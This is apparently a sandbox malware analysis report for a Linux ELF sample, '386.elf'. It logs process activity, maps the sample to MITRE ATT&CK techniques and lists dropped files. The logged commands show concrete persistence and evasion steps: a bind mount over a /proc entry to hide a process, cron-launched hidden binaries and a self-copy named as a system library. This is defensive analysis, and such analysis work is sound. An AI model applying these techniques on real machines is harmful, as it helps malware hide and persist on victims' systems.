MD5 hash:	16a21f464119ea7fad1d3660de963637

Chronological Activities

Analysis Process: systemctl PID: 5514, Parent PID: 5513

General

Start time (UTC):	14:37:51
Start date (UTC):	08/01/2025
Path:	/usr/bin/systemctl
Arguments:	systemctl daemon-reload
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: 386.elf PID: 5520, Parent PID: 5489

General

Start time (UTC):	14:37:51
Start date (UTC):	08/01/2025
Path:	/tmp/386.elf
Arguments:	-
File size:	5128192 bytes
MD5 hash:	2e2c8be0fb51f7fa433e76a43a2621ba

Chronological Activities

Analysis Process: mount PID: 5520, Parent PID: 5489

General

Start time (UTC):	14:37:51
Start date (UTC):	08/01/2025
Path:	/usr/bin/mount
Arguments:	mount -o bind /tmp/ /proc/5489
File size:	55528 bytes
MD5 hash:	92b20aa8b155ecd3ba9414aa477ef565

Chronological Activities

Analysis Process: 386.elf PID: 5542, Parent PID: 5489

General

Start time (UTC):	14:37:51
Start date (UTC):	08/01/2025
Path:	/tmp/386.elf
Arguments:	-
File size:	5128192 bytes
MD5 hash:	2e2c8be0fb51f7fa433e76a43a2621ba

Chronological Activities

Analysis Process: service PID: 5542, Parent PID: 5489

General

Start time (UTC):	14:37:51
Start date (UTC):	08/01/2025
Path:	/usr/sbin/service
Arguments:	service cron start
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: service PID: 5543, Parent PID: 5542

General

Start time (UTC):	14:37:51
Start date (UTC):	08/01/2025
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: basename PID: 5543, Parent PID: 5542

General

Start time (UTC):	14:37:51
Start date (UTC):	08/01/2025
Path:	/usr/bin/basename
Arguments:	basename /usr/sbin/service
File size:	39256 bytes
MD5 hash:	3283660e59f128df18bec9b96fbd4d41

Chronological Activities

Analysis Process: service PID: 5544, Parent PID: 5542

General

Start time (UTC):	14:37:51
Start date (UTC):	08/01/2025
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: basename PID: 5544, Parent PID: 5542

General

Start time (UTC):	14:37:51
Start date (UTC):	08/01/2025
Path:	/usr/bin/basename
Arguments:	basename /usr/sbin/service
File size:	39256 bytes
MD5 hash:	3283660e59f128df18bec9b96fbd4d41

Chronological Activities

Analysis Process: service PID: 5545, Parent PID: 5542

General

Start time (UTC):	14:37:51
Start date (UTC):	08/01/2025
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: systemctl PID: 5545, Parent PID: 5542

General

Start time (UTC):	14:37:51
Start date (UTC):	08/01/2025
Path:	/usr/bin/systemctl
Arguments:	systemctl --quiet is-active multi-user.target
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: service PID: 5546, Parent PID: 5542

General

Start time (UTC):	14:37:51
Start date (UTC):	08/01/2025
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: service PID: 5547, Parent PID: 5546

General

Start time (UTC):	14:37:51
Start date (UTC):	08/01/2025
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: systemctl PID: 5547, Parent PID: 5546

General

Start time (UTC):	14:37:51
Start date (UTC):	08/01/2025
Path:	/usr/bin/systemctl
Arguments:	systemctl list-unit-files --full --type=socket
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: service PID: 5548, Parent PID: 5546

General

Start time (UTC):	14:37:51
Start date (UTC):	08/01/2025
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sed PID: 5548, Parent PID: 5546

General

Start time (UTC):	14:37:51
Start date (UTC):	08/01/2025
Path:	/usr/bin/sed
Arguments:	sed -ne s/\\.socket\\s[a-z]\\s*$/.socket/p
File size:	121288 bytes
MD5 hash:	885062561f66aa1d4af4c54b9e7cc81a

Chronological Activities

Analysis Process: systemctl PID: 5542, Parent PID: 5489

General

Start time (UTC):	14:37:53
Start date (UTC):	08/01/2025
Path:	/usr/bin/systemctl
Arguments:	systemctl start cron.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: 386.elf PID: 5572, Parent PID: 5489

General

Start time (UTC):	14:37:53
Start date (UTC):	08/01/2025
Path:	/tmp/386.elf
Arguments:	-
File size:	5128192 bytes
MD5 hash:	2e2c8be0fb51f7fa433e76a43a2621ba

Chronological Activities

Analysis Process: systemctl PID: 5572, Parent PID: 5489

General

Start time (UTC):	14:37:53
Start date (UTC):	08/01/2025
Path:	/usr/bin/systemctl
Arguments:	systemctl start crond.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: systemd PID: 5500, Parent PID: 5499

General

Start time (UTC):	14:37:49
Start date (UTC):	08/01/2025
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: snapd-env-generator PID: 5500, Parent PID: 5499

General

Start time (UTC):	14:37:49
Start date (UTC):	08/01/2025
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Chronological Activities

Analysis Process: systemd PID: 5504, Parent PID: 5503

General

Start time (UTC):	14:37:50
Start date (UTC):	08/01/2025
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: snapd-env-generator PID: 5504, Parent PID: 5503

General

Start time (UTC):	14:37:50
Start date (UTC):	08/01/2025
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Chronological Activities

Analysis Process: systemd PID: 5518, Parent PID: 5517

General

Start time (UTC):	14:37:51
Start date (UTC):	08/01/2025
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: snapd-env-generator PID: 5518, Parent PID: 5517

General

Start time (UTC):	14:37:51
Start date (UTC):	08/01/2025
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Chronological Activities

Analysis Process: udisksd PID: 5530, Parent PID: 803

General

Start time (UTC):	14:37:51
Start date (UTC):	08/01/2025
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Chronological Activities

Analysis Process: dumpe2fs PID: 5530, Parent PID: 803

General

Start time (UTC):	14:37:51
Start date (UTC):	08/01/2025
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Chronological Activities

Analysis Process: systemd PID: 5561, Parent PID: 1

General

Start time (UTC):	14:37:53
Start date (UTC):	08/01/2025
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: cron PID: 5561, Parent PID: 1

General

Start time (UTC):	14:37:53
Start date (UTC):	08/01/2025
Path:	/usr/sbin/cron
Arguments:	/usr/sbin/cron -f
File size:	55944 bytes
MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Chronological Activities

Analysis Process: cron PID: 5578, Parent PID: 5561

General

Start time (UTC):	14:38:01
Start date (UTC):	08/01/2025
Path:	/usr/sbin/cron
Arguments:	-
File size:	55944 bytes
MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Chronological Activities

Analysis Process: cron PID: 5585, Parent PID: 5578

General

Start time (UTC):	14:38:01
Start date (UTC):	08/01/2025
Path:	/usr/sbin/cron
Arguments:	-
File size:	55944 bytes
MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Chronological Activities

Analysis Process: sh PID: 5585, Parent PID: 5578

General

Start time (UTC):	14:38:01
Start date (UTC):	08/01/2025
Path:	/bin/sh
Arguments:	/bin/sh -c "/.mod "
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5586, Parent PID: 5585

General

Start time (UTC):	14:38:01
Start date (UTC):	08/01/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: .mod PID: 5586, Parent PID: 5585

General

Start time (UTC):	14:38:01
Start date (UTC):	08/01/2025
Path:	/.mod
Arguments:	/.mod
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: .mod PID: 5587, Parent PID: 5586

General

Start time (UTC):	14:38:01
Start date (UTC):	08/01/2025
Path:	/.mod
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: libgdi.so.0.8.2 PID: 5587, Parent PID: 5586

General

Start time (UTC):	14:38:01
Start date (UTC):	08/01/2025
Path:	/usr/lib/libgdi.so.0.8.2
Arguments:	/usr/lib/libgdi.so.0.8.2
File size:	5128192 bytes
MD5 hash:	2e2c8be0fb51f7fa433e76a43a2621ba

Chronological Activities

Analysis Process: libgdi.so.0.8.2 PID: 5591, Parent PID: 5587

General

Start time (UTC):	14:38:01
Start date (UTC):	08/01/2025
Path:	/usr/lib/libgdi.so.0.8.2
Arguments:	-
File size:	5128192 bytes
MD5 hash:	2e2c8be0fb51f7fa433e76a43a2621ba

Chronological Activities

Analysis Process: libgdi.so.0.8.2 PID: 5591, Parent PID: 5587

General

Start time (UTC):	14:38:01
Start date (UTC):	08/01/2025
Path:	/usr/lib/libgdi.so.0.8.2
Arguments:	/usr/lib/libgdi.so.0.8.2
File size:	5128192 bytes
MD5 hash:	2e2c8be0fb51f7fa433e76a43a2621ba

Chronological Activities

Analysis Process: systemd PID: 5616, Parent PID: 1

General

Start time (UTC):	14:38:02
Start date (UTC):	08/01/2025
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: cron PID: 5616, Parent PID: 1

General

Start time (UTC):	14:38:02
Start date (UTC):	08/01/2025
Path:	/usr/sbin/cron
Arguments:	/usr/sbin/cron -f
File size:	55944 bytes
MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Chronological Activities

Analysis Process: cron PID: 5667, Parent PID: 5616

General

Start time (UTC):	14:39:01
Start date (UTC):	08/01/2025
Path:	/usr/sbin/cron
Arguments:	-
File size:	55944 bytes
MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Chronological Activities

Analysis Process: cron PID: 5678, Parent PID: 5667

General

Start time (UTC):	14:39:01
Start date (UTC):	08/01/2025
Path:	/usr/sbin/cron
Arguments:	-
File size:	55944 bytes
MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Chronological Activities

Analysis Process: sh PID: 5678, Parent PID: 5667

General

Start time (UTC):	14:39:01
Start date (UTC):	08/01/2025
Path:	/bin/sh
Arguments:	/bin/sh -c "/.mod "
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5679, Parent PID: 5678

General

Start time (UTC):	14:39:01
Start date (UTC):	08/01/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: .mod PID: 5679, Parent PID: 5678

General

Start time (UTC):	14:39:01
Start date (UTC):	08/01/2025
Path:	/.mod
Arguments:	/.mod
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: .mod PID: 5684, Parent PID: 5679

General

Start time (UTC):	14:39:01
Start date (UTC):	08/01/2025
Path:	/.mod
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: libgdi.so.0.8.2 PID: 5684, Parent PID: 5679

General

Start time (UTC):	14:39:01
Start date (UTC):	08/01/2025
Path:	/usr/lib/libgdi.so.0.8.2
Arguments:	/usr/lib/libgdi.so.0.8.2
File size:	5128192 bytes
MD5 hash:	2e2c8be0fb51f7fa433e76a43a2621ba

Chronological Activities

Analysis Process: libgdi.so.0.8.2 PID: 5688, Parent PID: 5684

General

Start time (UTC):	14:39:01
Start date (UTC):	08/01/2025
Path:	/usr/lib/libgdi.so.0.8.2
Arguments:	-
File size:	5128192 bytes
MD5 hash:	2e2c8be0fb51f7fa433e76a43a2621ba

Chronological Activities

Analysis Process: libgdi.so.0.8.2 PID: 5688, Parent PID: 5684

General

Start time (UTC):	14:39:01
Start date (UTC):	08/01/2025
Path:	/usr/lib/libgdi.so.0.8.2
Arguments:	/usr/lib/libgdi.so.0.8.2
File size:	5128192 bytes
MD5 hash:	2e2c8be0fb51f7fa433e76a43a2621ba

Chronological Activities

Analysis Process: cron PID: 5673, Parent PID: 5616

General

Start time (UTC):	14:39:01
Start date (UTC):	08/01/2025
Path:	/usr/sbin/cron
Arguments:	-
File size:	55944 bytes
MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Chronological Activities

Analysis Process: cron PID: 5677, Parent PID: 5673

General

Start time (UTC):	14:39:01
Start date (UTC):	08/01/2025
Path:	/usr/sbin/cron
Arguments:	-
File size:	55944 bytes
MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Chronological Activities

Analysis Process: sh PID: 5677, Parent PID: 5673

General

Start time (UTC):	14:39:01
Start date (UTC):	08/01/2025
Path:	/bin/sh
Arguments:	/bin/sh -c " [ -x /usr/lib/php/sessionclean ] && if [ ! -d /run/systemd/system ]; then /usr/lib/php/sessionclean; fi"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: systemd PID: 5693, Parent PID: 1

General

Start time (UTC):	14:39:01
Start date (UTC):	08/01/2025
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: cron PID: 5693, Parent PID: 1

General

Start time (UTC):	14:39:01
Start date (UTC):	08/01/2025
Path:	/usr/sbin/cron
Arguments:	/usr/sbin/cron -f
File size:	55944 bytes
MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User Unix Shell s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system ( `/etc` ) and the user’s home directory ( `~/` ) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation
Platforms:	Linux, macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Service: Service Creation, Service: Service Modification
Platforms:	Linux
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.
Tactics:	Defense Evasion
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Creation, File: File Metadata, File: File Modification, Firmware: Firmware Modification, Process: OS API Execution, Process: Process Creation, Script: Script Execution, Service: Service Creation, User Account: User Account Creation, User Account: User Account Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.
Tactics:	Impact
Data Sources:	File: File Creation, File: File Deletion, File: File Metadata, File: File Modification, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report 386.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Yara Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/.mod

/etc/.cfg

/etc/crontab

/etc/init.d/acpid

/etc/init.d/alsa-utils

/etc/init.d/anacron

/etc/init.d/apparmor

/etc/init.d/apport

/etc/init.d/avahi-daemon

/etc/init.d/binfmt-support

/etc/init.d/bluetooth

/etc/init.d/console-setup.sh

/etc/init.d/cron

/etc/init.d/cryptdisks

/etc/init.d/cryptdisks-early

/etc/init.d/cups

/etc/init.d/cups-browsed

/etc/init.d/dbus

/etc/init.d/dns-udp4

/etc/init.d/gdm3

/etc/init.d/hddtemp

/etc/init.d/hwclock.sh

/etc/init.d/irqbalance

/etc/init.d/iscsid

/etc/init.d/keyboard-setup.sh

/etc/init.d/kmod

/etc/init.d/lightdm

/etc/init.d/lm-sensors

/etc/init.d/lvm2-lvmpolld

/etc/init.d/mono-xsp4

/etc/init.d/multipath-tools

/etc/init.d/open-iscsi

Linux Analysis Report
386.elf